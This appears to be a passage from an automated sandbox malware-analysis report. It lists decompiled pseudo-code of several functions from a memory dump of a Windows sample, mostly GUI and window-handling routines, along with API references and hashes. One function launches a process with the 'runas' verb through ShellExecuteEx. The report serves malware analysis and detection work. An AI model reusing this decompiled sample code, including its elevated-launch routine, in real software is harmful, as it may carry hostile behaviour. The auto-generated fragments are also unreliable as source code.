                                                    • Opcode Fuzzy Hash: 1d318198154b46cf8f2b40026440cf65ed92ca40f81abb2fb166fbe13c1f9689
                                                    • Instruction Fuzzy Hash: 9E318330B042449FE750FBA9DC42B9973A4EB44305F9440BABD08EB2D7DE78A949C729
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00437D70 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00437D70(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* _t20;
				void* _t21;
				void* _t27;
				void* _t31;
				void* _t35;
				intOrPtr* _t43;

				_t43 =  &_v8;
				_t20 =  *0x49bc20; // 0x0
				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
				_t21 =  *0x49bc20; // 0x0
				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
					SetWindowLongA(_a4, 0xfffffff4, _a4);
				}
				_t27 =  *0x49bc20; // 0x0
				SetPropA(_a4,  *0x49eb26 & 0x0000ffff, _t27);
				_t31 =  *0x49bc20; // 0x0
				SetPropA(_a4,  *0x49eb24 & 0x0000ffff, _t31);
				_t35 =  *0x49bc20; // 0x0
				 *0x49bc20 = 0; // executed
				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
				return  *_t43;
			}










                                                    0x00437d75
                                                    0x00437d78
                                                    0x00437d80
                                                    0x00437d86
                                                    0x00437d98
                                                    0x00437dad
                                                    0x00437dc8
                                                    0x00437dc8
                                                    0x00437dcd
                                                    0x00437ddf
                                                    0x00437de4
                                                    0x00437df6
                                                    0x00437e07
                                                    0x00437e0c
                                                    0x00437e1c
                                                    0x00437e24

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LongWindow$Prop
                                                    • String ID:
                                                    • API String ID: 3887896539-0
                                                    • Opcode ID: 51d6e6583fdfce383e099e89a982cca909cf1dddc6894a580fa6964d4a767a4a
                                                    • Instruction ID: b5f16ed505960de4fc23b1fb6768328cc78d5017c86fd9e1eb6bf423726d3339
                                                    • Opcode Fuzzy Hash: 51d6e6583fdfce383e099e89a982cca909cf1dddc6894a580fa6964d4a767a4a
                                                    • Instruction Fuzzy Hash: 0111CCB5504208BFDB10DF9DDD84EAA37E8EB1C354F10462AF914DB2A1DB34E9409BA9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00457FC8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 84%
                                                    			E00457FC8(char __edx, void* __edi) {
				char _v5;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				intOrPtr _t25;
				intOrPtr* _t28;
				intOrPtr* _t29;
				intOrPtr _t42;
				intOrPtr* _t45;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t62;
				void* _t63;
				char _t64;
				void* _t74;
				intOrPtr _t75;
				void* _t76;
				void* _t77;

				_t74 = __edi;
				_t64 = __edx;
				if(__edx != 0) {
					_t77 = _t77 + 0xfffffff0;
					_t25 = E00403F10(_t25, _t76);
				}
				_v5 = _t64;
				_t62 = _t25;
				E00421B3C(_t63, 0);
				_t28 =  *0x49d878; // 0x49b510
				 *((intOrPtr*)(_t28 + 4)) = _t62;
				 *_t28 = 0x45836c;
				_t29 =  *0x49d888; // 0x49b518
				 *((intOrPtr*)(_t29 + 4)) = _t62;
				 *_t29 = 0x458378;
				E00458384(_t62);
				 *((intOrPtr*)(_t62 + 0x3c)) = GetKeyboardLayout(0);
				 *((intOrPtr*)(_t62 + 0x4c)) = E00403BBC(1);
				 *((intOrPtr*)(_t62 + 0x50)) = E00403BBC(1);
				 *((intOrPtr*)(_t62 + 0x54)) = E00403BBC(1);
				 *((intOrPtr*)(_t62 + 0x58)) = E00403BBC(1);
				_t42 = E00403BBC(1);
				 *((intOrPtr*)(_t62 + 0x7c)) = _t42;
				L00407638();
				_t75 = _t42;
				L00407380();
				 *((intOrPtr*)(_t62 + 0x40)) = _t42;
				L00407888();
				_t11 = _t62 + 0x58; // 0x45122c6e
				_t45 =  *0x49dae4; // 0x49e91c
				 *((intOrPtr*)( *_t45))(0, 0, E004547A0,  *_t11, 0, _t75, _t75, 0x5a, 0);
				 *((intOrPtr*)(_t62 + 0x84)) = E00424C3C(1);
				 *((intOrPtr*)(_t62 + 0x88)) = E00424C3C(1);
				 *((intOrPtr*)(_t62 + 0x80)) = E00424C3C(1);
				E004587A4(_t62, _t62, _t63, _t74);
				_t15 = _t62 + 0x84; // 0x38004010
				_t56 =  *_t15;
				 *((intOrPtr*)(_t56 + 0xc)) = _t62;
				 *((intOrPtr*)(_t56 + 8)) = 0x458680;
				_t18 = _t62 + 0x88; // 0x90000000
				_t57 =  *_t18;
				 *((intOrPtr*)(_t57 + 0xc)) = _t62;
				 *((intOrPtr*)(_t57 + 8)) = 0x458680;
				_t21 = _t62 + 0x80; // 0x94000000
				_t58 =  *_t21;
				 *((intOrPtr*)(_t58 + 0xc)) = _t62;
				 *((intOrPtr*)(_t58 + 8)) = 0x458680;
				_t59 = _t62;
				if(_v5 != 0) {
					E00403F68(_t59);
					_pop( *[fs:0x0]);
				}
				return _t62;
			}























                                                    0x00457fc8
                                                    0x00457fc8
                                                    0x00457fd0
                                                    0x00457fd2
                                                    0x00457fd5
                                                    0x00457fd5
                                                    0x00457fda
                                                    0x00457fdd
                                                    0x00457fe3
                                                    0x00457fe8
                                                    0x00457fed
                                                    0x00457ff0
                                                    0x00457ff6
                                                    0x00457ffb
                                                    0x00457ffe
                                                    0x00458006
                                                    0x00458012
                                                    0x00458021
                                                    0x00458030
                                                    0x0045803f
                                                    0x0045804e
                                                    0x00458058
                                                    0x0045805d
                                                    0x00458062
                                                    0x00458067
                                                    0x0045806c
                                                    0x00458071
                                                    0x00458077
                                                    0x0045807c
                                                    0x0045808a
                                                    0x00458091
                                                    0x0045809f
                                                    0x004580b1
                                                    0x004580c3
                                                    0x004580cb
                                                    0x004580d0
                                                    0x004580d0
                                                    0x004580d6
                                                    0x004580d9
                                                    0x004580e0
                                                    0x004580e0
                                                    0x004580e6
                                                    0x004580e9
                                                    0x004580f0
                                                    0x004580f0
                                                    0x004580f6
                                                    0x004580f9
                                                    0x00458100
                                                    0x00458106
                                                    0x00458108
                                                    0x0045810d
                                                    0x00458114
                                                    0x0045811d

                                                    APIs
                                                    • GetKeyboardLayout.USER32 ref: 0045800D
                                                    • 733AAC50.USER32(00000000,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 00458062
                                                    • 733AAD70.GDI32(00000000,0000005A,00000000,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 0045806C
                                                    • 733AB380.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?), ref: 00458077
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: B380KeyboardLayout
                                                    • String ID: 5B
                                                    • API String ID: 648844651-3738334870
                                                    • Opcode ID: 5487fb6c7b3bcedcedcd71127f0cf86c88c6ea033be2a968eb4a0643db19cfd2
                                                    • Instruction ID: 7c78f0e896318b154a236a51f14d482704da40fbffa7cbfd833c934430294294
                                                    • Opcode Fuzzy Hash: 5487fb6c7b3bcedcedcd71127f0cf86c88c6ea033be2a968eb4a0643db19cfd2
                                                    • Instruction Fuzzy Hash: 2331EA706052049FD740EF2AD8C1B497BE5FB05319F4480BEEC08DF367DA7AA9498B59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00473490 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67sleepsynchronizationCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 75%
                                                    			E00473490(intOrPtr __eax, void* __ebx, char __ecx, intOrPtr __edx, void* __eflags, char _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				intOrPtr _v44;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				char* _t33;
				intOrPtr _t43;
				intOrPtr _t52;
				void* _t56;

				_v12 = __ecx;
				_v8 = __edx;
				_t43 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				_push(_t56);
				_push(0x473564);
				_push( *[fs:eax]);
				 *[fs:eax] = _t56 + 0xffffffbc;
				E004032B4( &_v72, 0x3c);
				_v72 = 0x3c;
				_v64 = _t43;
				_v68 = 0x440;
				_v56 = E00404E80(_v8);
				if(_a8 != 0) {
					_v60 = 0x473574;
				}
				if(_v12 != 0) {
					_v52 = E00404E80(_v12);
				}
				_v44 = 1;
				_t33 =  &_v72;
				_push(_t33); // executed
				L0042EC28(); // executed
				if(_t33 != 0) {
					if(_a4 != 0 && _v16 != 0) {
						while(WaitForSingleObject(_v16, 0x32) == 0x102) {
							Sleep(0x32);
						}
					}
				}
				_pop(_t52);
				 *[fs:eax] = _t52;
				_push(0x47356b);
				return E004049E4( &_v12, 2);
			}

















                                                    0x00473497
                                                    0x0047349a
                                                    0x0047349d
                                                    0x004734a2
                                                    0x004734aa
                                                    0x004734b1
                                                    0x004734b2
                                                    0x004734b7
                                                    0x004734ba
                                                    0x004734c7
                                                    0x004734cc
                                                    0x004734d3
                                                    0x004734d6
                                                    0x004734e5
                                                    0x004734ec
                                                    0x004734f3
                                                    0x004734f3
                                                    0x004734fa
                                                    0x00473504
                                                    0x00473504
                                                    0x00473507
                                                    0x0047350e
                                                    0x00473511
                                                    0x00473512
                                                    0x00473519
                                                    0x0047351f
                                                    0x00473530
                                                    0x0047352b
                                                    0x0047352b
                                                    0x00473530
                                                    0x00473542
                                                    0x0047354b
                                                    0x0047354e
                                                    0x00473551
                                                    0x00473563

                                                    APIs
                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00473512
                                                    • Sleep.KERNEL32(00000032,00000000,00000032,00000000,00473564), ref: 0047352B
                                                    • WaitForSingleObject.KERNEL32(00000000,00000032,00000000,00473564), ref: 00473536
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExecuteObjectShellSingleSleepWait
                                                    • String ID: <$runas
                                                    • API String ID: 3175876650-1187129395
                                                    • Opcode ID: d2f4098c0599bc8fe6b33f95c7c42db526a5f4d83c62203c5c16265f54e5b256
                                                    • Instruction ID: 5aa402594196cc22e358d2c9fc2044dae5621586ffdb0388778a4eaf1ff726ef
                                                    • Opcode Fuzzy Hash: d2f4098c0599bc8fe6b33f95c7c42db526a5f4d83c62203c5c16265f54e5b256
                                                    • Instruction Fuzzy Hash: BC217FB0904208BBDB15DFAAD486BDEBBB8EB04304F50807BF508A6291D77C9B45DB49
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004534EC Relevance: 7.7, APIs: 5, Instructions: 171COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 89%
                                                    			E004534EC(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				signed char _t92;
				int _t98;
				int _t100;
				intOrPtr _t117;
				int _t122;
				intOrPtr _t155;
				void* _t164;
				signed char _t180;
				intOrPtr _t182;
				intOrPtr _t194;
				int _t199;
				intOrPtr _t203;
				void* _t204;

				_t204 = __eflags;
				_t196 = __edi;
				_t202 = _t203;
				_v8 = __eax;
				E0043DF9C(_v8);
				_push(_t203);
				_push(0x453742);
				_push( *[fs:edx]);
				 *[fs:edx] = _t203;
				 *(_v8 + 0x268) = 0;
				 *(_v8 + 0x26c) = 0;
				 *(_v8 + 0x270) = 0;
				_t164 = 0;
				_t92 =  *0x49e665; // 0x0
				 *(_v8 + 0x234) = _t92 ^ 0x00000001;
				E0043D6F8(_v8, 0, __edx, _t204); // executed
				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
					L12:
					_t98 =  *(_v8 + 0x268);
					_t213 = _t98;
					if(_t98 > 0) {
						E0043A998(_v8, _t98, _t196, _t213);
					}
					_t100 =  *(_v8 + 0x26c);
					_t214 = _t100;
					if(_t100 > 0) {
						E0043A9DC(_v8, _t100, _t196, _t214);
					}
					_t180 =  *0x453750; // 0x0
					 *(_v8 + 0x98) = _t180;
					_t215 = _t164;
					if(_t164 == 0) {
						E00452B4C(_v8, 1, 1);
						E004411C8(_v8, 1, 1, _t215);
					}
					E0043C130(_v8, 0, 0xb03d, 0);
					_pop(_t182);
					 *[fs:eax] = _t182;
					_push(0x453749);
					return E0043DFA4(_v8);
				} else {
					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
						_t194 =  *0x49ebbc; // 0x0
						if( *(_v8 + 0x25c) !=  *((intOrPtr*)(_t194 + 0x40))) {
							_t155 =  *0x49ebbc; // 0x0
							E00424FF8( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E00424FF0( *((intOrPtr*)(_v8 + 0x68))),  *(_t155 + 0x40),  *(_v8 + 0x25c)), __edi, _t202);
						}
					}
					_t117 =  *0x49ebbc; // 0x0
					 *(_v8 + 0x25c) =  *(_t117 + 0x40);
					_t199 = E00453874(_v8);
					_t122 =  *(_v8 + 0x270);
					_t209 = _t199 - _t122;
					if(_t199 != _t122) {
						_t164 = 1;
						E00452B4C(_v8, _t122, _t199);
						E004411C8(_v8,  *(_v8 + 0x270), _t199, _t209);
						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t199,  *(_v8 + 0x270));
							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t199,  *(_v8 + 0x270));
						}
					}
					goto L12;
				}
			}

















                                                    0x004534ec
                                                    0x004534ec
                                                    0x004534ed
                                                    0x004534f4
                                                    0x004534fa
                                                    0x00453501
                                                    0x00453502
                                                    0x00453507
                                                    0x0045350a
                                                    0x00453512
                                                    0x0045351d
                                                    0x00453528
                                                    0x0045352e
                                                    0x00453530
                                                    0x0045353a
                                                    0x00453545
                                                    0x00453554
                                                    0x004536b6
                                                    0x004536b9
                                                    0x004536bf
                                                    0x004536c1
                                                    0x004536c8
                                                    0x004536c8
                                                    0x004536d0
                                                    0x004536d6
                                                    0x004536d8
                                                    0x004536df
                                                    0x004536df
                                                    0x004536e7
                                                    0x004536ed
                                                    0x004536f3
                                                    0x004536f5
                                                    0x00453704
                                                    0x00453716
                                                    0x00453716
                                                    0x00453727
                                                    0x0045372e
                                                    0x00453731
                                                    0x00453734
                                                    0x00453741
                                                    0x0045356a
                                                    0x00453574
                                                    0x0045357f
                                                    0x00453588
                                                    0x00453594
                                                    0x004535b4
                                                    0x004535b4
                                                    0x00453588
                                                    0x004535b9
                                                    0x004535c4
                                                    0x004535d2
                                                    0x004535d7
                                                    0x004535dd
                                                    0x004535df
                                                    0x004535e5
                                                    0x004535ee
                                                    0x00453601
                                                    0x00453610
                                                    0x0045362f
                                                    0x0045362f
                                                    0x0045363f
                                                    0x0045365e
                                                    0x0045365e
                                                    0x0045366e
                                                    0x0045368d
                                                    0x004536b0
                                                    0x004536b0
                                                    0x0045366e
                                                    0x00000000
                                                    0x004535df

                                                    APIs
                                                    • MulDiv.KERNEL32(00000000,?,00000000), ref: 004535AB
                                                    • MulDiv.KERNEL32(?,00000000,00000000), ref: 00453627
                                                    • MulDiv.KERNEL32(?,00000000,00000000), ref: 00453656
                                                    • MulDiv.KERNEL32(?,00000000,00000000), ref: 00453685
                                                    • MulDiv.KERNEL32(?,00000000,00000000), ref: 004536A8
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bf453c4939c3507c7547244688a5841333b77e73213c39d2921ddabae2898744
                                                    • Instruction ID: c7ec2d223f710dc91b05457c805857c5415938e4303d673742531becb7789678
                                                    • Opcode Fuzzy Hash: bf453c4939c3507c7547244688a5841333b77e73213c39d2921ddabae2898744
                                                    • Instruction Fuzzy Hash: 9171F670A04104EFCB04DFA9C589EADB3F5AF48305F2941FAE808DB362D775AE459B44
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004348A8 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 76%
                                                    			E004348A8(void* __eax, void* __ebx, intOrPtr __ecx, int __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				long _t27;
				long _t34;
				int _t42;
				int _t43;
				intOrPtr _t50;
				int _t54;
				void* _t57;
				void* _t60;

				_v12 = 0;
				_v8 = __ecx;
				_t54 = __edx;
				_t57 = __eax;
				_push(_t60);
				_push(0x434993);
				_push( *[fs:eax]);
				 *[fs:eax] = _t60 + 0xfffffff8;
				if(__edx >= 0) {
					_t42 = SendMessageA(E00441704( *((intOrPtr*)(__eax + 0x10))), 0xbb, __edx, 0);
					if(_t42 < 0) {
						_t43 = SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xbb, _t54 - 1, 0);
						if(_t43 >= 0) {
							_t27 = SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xc1, _t43, 0);
							if(_t27 != 0) {
								_t42 = _t43 + _t27;
								E00404CCC( &_v12, _v8, 0x4349ac);
								goto L6;
							}
						}
					} else {
						E00404CCC( &_v12, 0x4349ac, _v8);
						L6:
						SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xb1, _t42, _t42);
						_t34 = E00404E80(_v12);
						SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xc2, 0, _t34); // executed
					}
				}
				_pop(_t50);
				 *[fs:eax] = _t50;
				_push(0x43499a);
				return E004049C0( &_v12);
			}













                                                    0x004348b3
                                                    0x004348b6
                                                    0x004348b9
                                                    0x004348bb
                                                    0x004348bf
                                                    0x004348c0
                                                    0x004348c5
                                                    0x004348c8
                                                    0x004348cd
                                                    0x004348e9
                                                    0x004348ed
                                                    0x00434918
                                                    0x0043491c
                                                    0x0043492f
                                                    0x00434936
                                                    0x00434938
                                                    0x00434945
                                                    0x00000000
                                                    0x00434945
                                                    0x00434936
                                                    0x004348ef
                                                    0x004348fa
                                                    0x0043494a
                                                    0x0043495a
                                                    0x00434962
                                                    0x00434978
                                                    0x00434978
                                                    0x004348ed
                                                    0x0043497f
                                                    0x00434982
                                                    0x00434985
                                                    0x00434992

                                                    APIs
                                                    • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 004348E4
                                                    • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00434913
                                                    • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 0043492F
                                                    • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0043495A
                                                    • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 00434978
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: 355f4deacd5125564ffb9ba19f0dd5d69ef2a983a7f0a38bbff004384fc211bf
                                                    • Instruction ID: 60fe2270a456efbc5898118594648b470be5076c4c12df513f5ffd0388d1f25b
                                                    • Opcode Fuzzy Hash: 355f4deacd5125564ffb9ba19f0dd5d69ef2a983a7f0a38bbff004384fc211bf
                                                    • Instruction Fuzzy Hash: A5219BB1644704ABE710ABB6CC82F9B76ACEF84718F10453EB501A73D2DB78BD00C559
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00454A44 Relevance: 6.1, APIs: 4, Instructions: 148windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 89%
                                                    			E00454A44(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t41;
				void* _t54;
				void* _t61;
				struct HMENU__* _t64;
				struct HMENU__* _t70;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t81;
				intOrPtr _t83;
				intOrPtr _t87;
				void* _t92;
				intOrPtr _t98;
				void* _t111;
				intOrPtr _t113;
				void* _t116;

				_t109 = __edi;
				_push(__edi);
				_v20 = 0;
				_t113 = __edx;
				_t92 = __eax;
				_push(_t116);
				_push(0x454c0a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t116 + 0xfffffff0;
				if(__edx == 0) {
					L7:
					_t39 =  *((intOrPtr*)(_t92 + 0x248));
					if( *((intOrPtr*)(_t92 + 0x248)) != 0) {
						E0044E3BC(_t39, 0, _t109, 0);
					}
					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t113 != 0 && ( *(_t113 + 0x1c) & 0x00000008) != 0) {
						_t113 = 0;
					}
					 *((intOrPtr*)(_t92 + 0x248)) = _t113;
					if(_t113 != 0) {
						E00421C0C(_t113, _t92);
					}
					if(_t113 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x229)) == 3) {
						_t41 = E00441A08(_t92);
						__eflags = _t41;
						if(_t41 != 0) {
							SetMenu(E00441704(_t92), 0); // executed
						}
						goto L30;
					} else {
						if( *((char*)( *((intOrPtr*)(_t92 + 0x248)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x22f)) == 1) {
							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
								__eflags =  *((char*)(_t92 + 0x22f)) - 1;
								if( *((char*)(_t92 + 0x22f)) != 1) {
									_t54 = E00441A08(_t92);
									__eflags = _t54;
									if(_t54 != 0) {
										SetMenu(E00441704(_t92), 0);
									}
								}
								goto L30;
							}
							goto L21;
						} else {
							L21:
							if(E00441A08(_t92) != 0) {
								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
								_t110 = _t61;
								_t64 = GetMenu(E00441704(_t92));
								_t138 = _t61 - _t64;
								if(_t61 != _t64) {
									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
									SetMenu(E00441704(_t92), _t70);
								}
								E0044E3BC(_t113, E00441704(_t92), _t110, _t138);
							}
							L30:
							if( *((char*)(_t92 + 0x22e)) != 0) {
								E00455B08(_t92, 1);
							}
							E0045497C(_t92);
							_pop(_t98);
							 *[fs:eax] = _t98;
							_push(0x454c11);
							return E004049C0( &_v20);
						}
					}
				}
				_t77 =  *0x49ebbc; // 0x0
				_t79 = E00458274(_t77) - 1;
				if(_t79 >= 0) {
					_v8 = _t79 + 1;
					_t111 = 0;
					do {
						_t81 =  *0x49ebbc; // 0x0
						if(_t113 ==  *((intOrPtr*)(E00458260(_t81, _t111) + 0x248))) {
							_t83 =  *0x49ebbc; // 0x0
							if(_t92 != E00458260(_t83, _t111)) {
								_v16 =  *((intOrPtr*)(_t113 + 8));
								_v12 = 0xb;
								_t87 =  *0x49d8b4; // 0x423118
								E00406A70(_t87,  &_v20);
								E0040D180(_t92, _v20, 1, _t111, _t113, 0,  &_v16);
								E00404378();
							}
						}
						_t111 = _t111 + 1;
						_t10 =  &_v8;
						 *_t10 = _v8 - 1;
					} while ( *_t10 != 0);
				}
			}






















                                                    0x00454a44
                                                    0x00454a4c
                                                    0x00454a4f
                                                    0x00454a52
                                                    0x00454a54
                                                    0x00454a58
                                                    0x00454a59
                                                    0x00454a5e
                                                    0x00454a61
                                                    0x00454a66
                                                    0x00454ad8
                                                    0x00454ad8
                                                    0x00454ae0
                                                    0x00454ae4
                                                    0x00454ae4
                                                    0x00454aed
                                                    0x00454af9
                                                    0x00454af9
                                                    0x00454afb
                                                    0x00454b03
                                                    0x00454b09
                                                    0x00454b09
                                                    0x00454b10
                                                    0x00454bc3
                                                    0x00454bc8
                                                    0x00454bca
                                                    0x00454bd6
                                                    0x00454bd6
                                                    0x00000000
                                                    0x00454b29
                                                    0x00454b33
                                                    0x00454b42
                                                    0x00454b9c
                                                    0x00454ba3
                                                    0x00454ba7
                                                    0x00454bac
                                                    0x00454bae
                                                    0x00454bba
                                                    0x00454bba
                                                    0x00454bae
                                                    0x00000000
                                                    0x00454ba3
                                                    0x00000000
                                                    0x00454b44
                                                    0x00454b44
                                                    0x00454b4d
                                                    0x00454b5b
                                                    0x00454b5e
                                                    0x00454b68
                                                    0x00454b6d
                                                    0x00454b6f
                                                    0x00454b79
                                                    0x00454b85
                                                    0x00454b85
                                                    0x00454b95
                                                    0x00454b95
                                                    0x00454bdb
                                                    0x00454be2
                                                    0x00454be8
                                                    0x00454be8
                                                    0x00454bef
                                                    0x00454bf6
                                                    0x00454bf9
                                                    0x00454bfc
                                                    0x00454c09
                                                    0x00454c09
                                                    0x00454b33
                                                    0x00454b10
                                                    0x00454a68
                                                    0x00454a72
                                                    0x00454a75
                                                    0x00454a78
                                                    0x00454a7b
                                                    0x00454a7d
                                                    0x00454a7f
                                                    0x00454a8f
                                                    0x00454a93
                                                    0x00454a9f
                                                    0x00454aa4
                                                    0x00454aa7
                                                    0x00454ab4
                                                    0x00454ab9
                                                    0x00454ac8
                                                    0x00454acd
                                                    0x00454acd
                                                    0x00454a9f
                                                    0x00454ad2
                                                    0x00454ad3
                                                    0x00454ad3
                                                    0x00454ad3
                                                    0x00454a7d

                                                    APIs
                                                    • GetMenu.USER32(00000000), ref: 00454B68
                                                    • SetMenu.USER32(00000000,00000000), ref: 00454B85
                                                    • SetMenu.USER32(00000000,00000000), ref: 00454BBA
                                                    • SetMenu.USER32(00000000,00000000,00000000,00454C0A), ref: 00454BD6
                                                      • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
